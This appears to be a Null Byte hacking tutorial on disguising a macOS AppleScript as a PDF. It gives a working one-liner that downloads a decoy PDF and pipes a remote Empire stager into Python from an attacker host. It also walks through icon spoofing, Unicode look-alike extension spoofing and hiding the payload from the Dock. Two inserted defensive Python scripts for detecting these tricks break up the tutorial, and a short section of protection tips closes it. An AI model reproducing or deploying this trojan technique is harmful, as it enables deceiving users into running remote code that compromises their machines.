
Creating a Fake PDF Trojan with AppleScript, Part 2 (Disguising the Script) «Null Byte :: WonderHowTo



With the macOS stager created and the attacker's system hosting the Empire listener, the malicious AppleScript can now be created, using some Unicode and icon manipulation tricks, and disguised as a legitimate PDF.

This attack requires a real PDF to work. Files larger than 1 MB may be too large and may make the target suspicious. The real PDF is downloaded each time the target opens the trojanized AppleScript (the fake PDF), so it should be just one page and small enough to download quickly; otherwise the target might wonder why a PDF that should open in Preview immediately takes a few seconds to appear.

Previously: Creating a Fake PDF Trojan Using AppleScript, Part 1 (Creating the Stager)

In this follow-up to the first part on creating a malicious PDF for MacBooks, I'll show how to quickly create a fake PDF using the cover of a CompTIA study guide from AllITebooks; a higher-quality image should be used in a real scenario.

Step 1: Copy a PDF Cover Image

Navigate in your web browser to the site hosting the PDF file being cloned. In my example, this is the CompTIA study guide on AllITebooks. You do not really need to download the PDF file, you just need the first page image that appears in the preview, so right-click on it, choose "Save Image As", and save it with the name cover.jpg into the files/ directory.

Step 2: Install GIMP and open the image

To manipulate the PDF's cover image, we need GIMP, a popular and completely free image editing application. To install it, use the apt-get command below.

  apt-get install gimp 

Once installed, open cover.jpg in GIMP with the following command.

  gimp cover.jpg 

Step 3: Export the cover sheet as PDF

Next, export the image to the files/ directory by navigating to "File", then "Export As". Change the file name to real.pdf and the file type to "Portable Document Format (*.pdf)".

Step 4: Change Canvas Size

Apple icons must be perfectly symmetrical squares, and cover.jpg is rectangular. To fix this, navigate to the "Image" menu in GIMP, then "Canvas Size".

Change the Width to match the Height and click "Resize" to save the changes. The new canvas shows a lot of transparent space on the right side of the picture. To center the image, use the Align tool under "Tools", then "Transform Tools".

Left-click once on the image to select it, and then click the Center button. Note that the transparent area is now on both sides of the cover image, as shown below.

Step 5: Resizing the image

Now resize the image by navigating to "Image", then "Scale Image", and changing the width and height to 256.

Step 6: Exporting the cover page in PNG format

Export the image again to the files/ directory by navigating to "File", then "Export As". Change the file name to cover.png and the file type to "PNG Image (*.png)".

Step 7: Converting to ICNS Format

The final step for the images is to convert cover.png into Apple's ICNS icon file format. To do this, you can upload the cover.png file to cloudconvert and click the "Start conversion" button.

When the conversion is done, download the .icns file and save it in the files/ directory. There should now be four files in the files/ directory (you can verify this with ls).

  tokyoneon ~/files
  > ls
  cover.icns cover.jpg cover.png real.pdf

The cover.jpg and cover.png were used as templates and are no longer needed. The real.pdf is the small PDF that the target downloads each time the AppleScript (the fake PDF) is opened. The cover.icns is the Apple icon file used in a later step.

That's it for the Kali Linux end. To make the malicious AppleScript (fake PDF), I use the Script Editor in macOS High Sierra.

Step 8: Create the AppleScript

It should be possible to create trojanized AppleScripts with Kali, but it is a bit more involved than this article allows. To keep things simple, I use macOS with AppleScript version 2.7 and Script Editor version 2.10. If readers want a full Kali Linux method, please leave a comment and I'll see what I can do.

First, copy the real PDF being cloned to the macOS desktop. This allows the attacker to make a direct comparison when creating the forged PDF.

Then open Apple's built-in Script Editor (via Spotlight, Launchpad, or the Utilities folder under Applications) and copy the following script into the window. This is the single-line AppleScript that runs on the victim's MacBook when the fake PDF is double-clicked.

  do shell script "s=ATTACKER-IP-ADDRESS:PORT; curl -s $s/real.pdf | open -f -a Preview.app & curl -s $s/script | python -"
  • The start of the script (do shell script) is the AppleScript command directing the MacBook to execute the shell code that follows.
  • The attacker's server is set as a variable (s=ATTACKER-IP-ADDRESS:PORT) and should be changed to the attacker's local IP address. For example, s=192.16.0.14:8080.
  • The real PDF is downloaded (curl -s $s/real.pdf) from the attacker's server, piped (|), and opened (open -f -a Preview.app) with the macOS Preview application.
  • Lastly, the Empire stager, stored as "script" on the attacker's server, is downloaded (& curl -s $s/script | python -) and executed with Python on the victim's MacBook.
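For defenders, the useful part of that one-liner is the pattern it leaves in process telemetry. The following Python script is an added example, not code from the original post: it runs a few simple rules over constructed process events (a parent executable path and a child command line; both the format and the events are made up for this example, and 192.0.2.10 is a documentation address) and flags a download piped straight into an interpreter, a child of an exported AppleScript applet (exported script applications run as Contents/MacOS/applet, an assumption stated in the code), and a parent bundle whose name, once look-alike characters are folded to ASCII, ends in a document extension.

```python
import os
import re
import unicodedata

# Extensions a user expects to open a document, not launch a program.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".txt", ".jpg", ".png"}

# A download piped straight into an interpreter, as in `curl ... | python -`.
PIPE_TO_INTERPRETER = re.compile(
    r"\bcurl\b[^|]*\|\s*(?:python[23]?|perl|ruby|sh|bash)\b")

# Constructed sample events (parent executable, child command line); not real
# telemetry. Event 0 mirrors the AppleScript above with a documentation IP;
# the others are ordinary activity, including one risky-but-common install.
SAMPLE_EVENTS = [
    {"parent": "/Users/alice/Desktop/fake.p\u1e0bf.app/Contents/MacOS/applet",
     "cmd": "sh -c curl -s 192.0.2.10:8080/real.pdf | open -f -a Preview.app "
            "& curl -s 192.0.2.10:8080/script | python -"},
    {"parent": "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "cmd": "curl -s https://example.com/report.pdf -o report.pdf"},
    {"parent": "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "cmd": "curl -fsSL https://example.com/install.sh | bash"},
    {"parent": "/Applications/Preview.app/Contents/MacOS/Preview",
     "cmd": "open /Users/alice/Desktop/real.pdf"},
    {"parent": "/Users/alice/Scripts/Backup.app/Contents/MacOS/applet",
     "cmd": "sh -c rsync -a /Users/alice/Documents /Volumes/Backup/"},
]


def ascii_fold(name):
    """Decompose look-alike letters and drop combining marks: 'pḋf' -> 'pdf'."""
    decomposed = unicodedata.normalize("NFKD", name)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def bundle_of(path):
    """Return the first .app component of an executable path, or None."""
    for part in path.split("/"):
        if part.lower().endswith(".app"):
            return part
    return None


def reasons_for(event):
    """Return the list of rules the event trips (empty when nothing matches)."""
    reasons = []
    if PIPE_TO_INTERPRETER.search(event["cmd"]):
        reasons.append("download piped straight into an interpreter")
    parent = event["parent"]
    bundle = bundle_of(parent)
    # Assumption: an exported AppleScript application runs as Contents/MacOS/applet.
    if bundle and parent.endswith("/Contents/MacOS/applet"):
        reasons.append("spawned by an AppleScript applet")
    if bundle:
        shown = ascii_fold(bundle)[:-4]  # what Finder shows: no '.app' suffix
        if os.path.splitext(shown)[1].lower() in DOCUMENT_EXTS:
            reasons.append(f"parent app is named like a document: {bundle!r}")
    return reasons


def triage(events):
    """Return (index, reasons) for every event that trips at least one rule."""
    flagged = []
    for index, event in enumerate(events):
        reasons = reasons_for(event)
        if reasons:
            flagged.append((index, reasons))
    return flagged


if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: {len(reasons)} signal(s)")
        for reason in reasons:
            print("  -", reason)
```

On the constructed sample, event 0 trips all three rules, while events 2 (a curl-to-bash install) and 4 (a harmless applet) trip one each; a single signal is worth a look, but three together are exactly the shape of the file this article builds.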

Next, click "File" in the menu bar, then "Export" to start saving the AppleScript.

Export to the desktop with the filename fake, change the file format to "Application", and disable "Show startup screen".

Functionally speaking, the fake PDF behaves as intended. But looking at the two files side by side, there is still a lot to do to make it look like the real PDF on the left.

Step 9: Change the Icon

As seen in the GIF above, for the real .pdf file macOS generally uses the first page of the PDF to generate the file icon. This can easily be faked with the previously created .icns file. To change the icon, move the cover.icns file from the Kali system to the MacBook, right-click the fake file, and choose "Get Info".

Then drag the cover.icns file into the Info window of fake to change the icon.

The AppleScript now looks more like the real PDF. With a little patience, the crease in the top right corner of the icon, the outline of the icon, and the binder rings can be manipulated with GIMP and other photo editor tricks. The details of further spoofing the cover photo are a bit tedious, so I'll keep going – you get the idea.

Step 10: Spoof the file extension with Unicode

The bigger problem is the filename. Ideally, the AppleScript would carry a PDF file extension. But changing the file extension to .pdf causes macOS to display the AppleScript's true file extension.

As shown above, macOS automatically appends the .app extension. One way to get a convincing file extension is to use Unicode, a character encoding standard that assigns a unique number to every character.

Unicode U+1E0B is the Latin small letter D with a dot above, and at a glance it looks just like a normal "d" character.

Copying this character from the Wikipedia page and pasting into the AppleScript filename produces a much more convincing file extension.

At a glance, this difference could easily be mistaken for a speck of dust. On closer examination, the difference in the Latin "d" is clearer.

This is just one of many available Unicode characters that can be used for extension spoofing and other kinds of attacks.

Do not miss: How to easily generate hundreds of phishing domains

Step 11: Hide the Python script from the dock

Another problem with using AppleScripts this way is that after the script runs, the Dock shows two new items.

One icon represents Preview showing the real PDF; the other represents the malicious Python script that was executed in the background. To fix this, right-click on the fake.pdf file and choose "Show Package Contents".

Navigate to the "Contents" directory and open the "Info.plist" file in TextEdit. Add the following NSUIElement entry to the Info.plist file.

  <key>NSUIElement</key>
  <string>1</string>

This is how it should look in TextEdit:

How to Protect yourself from AppleScript Attacks

If you want to make sure you do not open a malicious PDF like this on your MacBook or other Mac computer, there are some simple things you can do to make this kind of AppleScript payload more noticeable.

  • Do Not Double-Click Files. It is always best to explicitly choose which program to use when opening files. Right-click on the desired file and manually select an application from the "Open With" menu.
  • Show All File Name Extensions. This Unicode trick was tested with Finder's default settings, where "Show all filename extensions" is disabled. To enable this setting, navigate to "Finder" in the menu bar, then "Settings", and activate the option on the "Advanced" tab.
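The two Finder settings above make the disguise visible to a person; the following Python script, added here as an example and not part of the original post, applies the same checks mechanically to a folder. It constructs its own sample folder (a real PDF, a text file, and a bundle named fake.pḋf.app, which is the on-disk name this trick produces once macOS appends .app to a filename containing U+1E0B) and reports three things: look-alike characters in a filename, an .app bundle whose visible name ends in a document extension, and an Info.plist that sets NSUIElement or LSUIElement as in Step 11. It goes slightly beyond the article by checking a short list of document extensions rather than .pdf alone; the list and the sample contents are assumptions of this example.

```python
import os
import plistlib
import tempfile
import unicodedata

# Extensions a user expects to open a document, not launch a program (assumed list).
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".txt", ".jpg", ".png"}
# Info.plist keys that keep an application out of the Dock (the Step 11 trick).
DOCK_HIDING_KEYS = ("NSUIElement", "LSUIElement")
# Constructed sample name: 'fake.pdf' with U+1E0B in place of the 'd', plus the
# '.app' suffix macOS adds to an exported AppleScript application.
FAKE_NAME = "fake.p\u1e0bf.app"


def ascii_fold(name):
    """Decompose look-alike letters and drop combining marks: 'pḋf' -> 'pdf'."""
    decomposed = unicodedata.normalize("NFKD", name)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def inspect_entry(path):
    """Return the list of findings for one directory entry (empty if clean)."""
    name = os.path.basename(path)
    findings = []

    folded = ascii_fold(name)
    if folded != name:
        findings.append(f"look-alike characters: {name!r} folds to {folded!r}")

    # Finder hides '.app' by default, so compare what the user actually sees.
    is_app = folded.lower().endswith(".app")
    visible = folded[:-4] if is_app else folded
    ext = os.path.splitext(visible)[1].lower()
    if os.path.isdir(path) and is_app and ext in DOCUMENT_EXTS:
        findings.append(f"app bundle shown with document extension {ext!r}")

    plist_path = os.path.join(path, "Contents", "Info.plist")
    if os.path.isfile(plist_path):
        with open(plist_path, "rb") as fh:
            info = plistlib.load(fh)
        for key in DOCK_HIDING_KEYS:
            # plistlib yields True for <true/> and '1' for <string>1</string>.
            if str(info.get(key, "")).lower() in ("1", "true"):
                findings.append(f"Info.plist {key} set: app hides itself from the Dock")
    return findings


def scan_directory(root):
    """Map each suspicious entry name under root to its findings."""
    report = {}
    for name in sorted(os.listdir(root)):
        findings = inspect_entry(os.path.join(root, name))
        if findings:
            report[name] = findings
    return report


def build_sample():
    """Create a constructed sample folder: a real PDF, a note, and a disguised bundle."""
    root = tempfile.mkdtemp(prefix="desktop-")
    with open(os.path.join(root, "real.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4\n% constructed one-page placeholder\n")
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("harmless text file\n")
    contents = os.path.join(root, FAKE_NAME, "Contents")
    os.makedirs(contents)
    with open(os.path.join(contents, "Info.plist"), "wb") as fh:
        plistlib.dump({"CFBundleName": "fake", "NSUIElement": "1"}, fh)
    return root


if __name__ == "__main__":
    for entry, findings in scan_directory(build_sample()).items():
        print(entry)
        for finding in findings:
            print("  -", finding)
```

Run against a real Desktop or Downloads folder by calling scan_directory on that path instead of build_sample(); the genuine real.pdf and notes.txt in the sample produce no findings, while the disguised bundle produces all three.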

There's going to be more in my Hacking macOS series. In future articles I will explore vectors for delivering the fake .pdf files to unsuspecting macOS users, post-exploitation keyloggers, keychain password dumping, webcam screenshots, and more. My epic quest against the myth that macOS is safer than Windows 10 is not over yet.

Don't Miss: More Null Byte Guides for Hacking macOS

Cover image by Startup Photos/PEXELS; screenshots by tokyoneon/Null Byte

